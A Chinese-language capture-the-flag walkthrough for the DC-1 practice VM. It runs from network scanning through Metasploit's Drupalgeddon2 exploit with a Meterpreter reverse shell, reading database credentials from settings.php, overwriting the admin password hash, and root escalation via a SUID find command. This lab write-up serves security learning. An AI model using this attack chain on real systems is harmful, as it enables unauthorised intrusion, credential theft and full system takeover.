dc-1靶机

环境配置：
kali虚拟机的安装：Kali虚拟机安装，设置中文等详细教程，Linux最新免镜像版
dc-1靶机的安装：官网下载

使用说明：下载后解压后得到一个ova的文件，在vm虚拟机中直接打开设置好相关的设置，配置好之后，注意靶机和kali的网络设置调换成NAT模式

渗透过程：
先打开靶机和kali，查看靶机的mac地址

然后在kali上使用arp-scan -l命令查看靶机ip

可以得到靶机地址是192.168.195.131，然后使用nmap -A 192.168.195.131
查看开放了什么端口

-A: 激进型 启用许多扫描选项，版本扫描，脚本扫描等(慎用)

可以看到开放了ssh端口和http和111端口，尝试查看一下网站，有一个登陆框，尝试sql注入，发现没有用，不过可以从界面发现cms是drupal

然后用御剑后台扫描，发现有些文件

知道了cms是drupal，drupal有一些可以利用的漏洞进入msf

msfconsole

查找相应模块

search Drupa

尝试使用相应模块发现 exploit/unix/webapp/drupal_drupalgeddon2可以使用

use exploit/unix/webapp/drupal_drupalgeddon2

选择查看payload

show payloads

发现了熟悉的反弹shell：php/meterpreter/reverse_tcp
使用payloads：set payload php/meterpreter/reverse_tcp
配置相应的设置：set rhosts 192.168.195.131
启动：exploit

查看DC-1基本信息：sysinfo
得到shell：shell
通过python反弹shell：python -c 'import pty; pty.spawn("/bin/bash")'
查看文件：

ls
cat flag1.txt

得到提示： 每个好的CMS都需要一个配置文件——你也是
提示配置文件，想到网站cms的根配置文件，网上查询drupal配置文件位置
查看配置文件：find / -name settings.php
查看网站目录：cat sites/default/settings.php
发现flag2和sql信息

翻译flag2：

蛮力和字典攻击是不是 *只有获得访问（您将需要访问）的方法。 *您可以如何处理这些凭据？

登录mysql，登陆之前一定要记得打开mysql服务

service mysql start

登录数据库：mysql -udbuser -pR0ck3t
下面就是基本的mysql的操作
查看库：show databases;
进入到drupaldb库中：user drupaldb;
查看表：show tables;
查看users表中的内容：select * from users;

得到用户名和密码,尝试修改密码：update users set pass='123456' where name="admin"显示修改成功，尝试去登陆发现登陆失败，这里显示的密码是加密过的，尝试去找到drupaldb的加密方式，然后把密码更改为一个加密过的但是是已知的密码。在drupal的官网上找到了druple的加密脚本位置./script/password-hash.sh，直接使用这个脚本进行加密。
退出mysql：quit
进行密码加密：

cd /var/www/scripts
ls

能找到加密脚本
使用脚本进行加密：./scripts/password-hash.sh 123

进入数据库进行改密update users set pass='$S$DFcCu/eLtuTy8fcKPKPPN1qRbTcgj9ci7pen8vQ6fw2E6DudTdNr' where name = "admin";

返回登陆页面进行登录，找到flag3

根据提示查看 /etc/passwd，发现flag4

cat /etc/passwd

尝试查看flag4

cd /home/flag4
ls
cat flag4.txt

根据提示要在根目录查看访问标志，需要提权到root用户

find / -perm -4000
//找suid的程序

发现find命令有suid权限，进行提权（find的提权操作）

find ./ aaa -exec '/bin/sh' \;

进入目录查看flag

cd /root
ls
cat thefinalflag.txt

这篇好文章是转载于：学新通技术网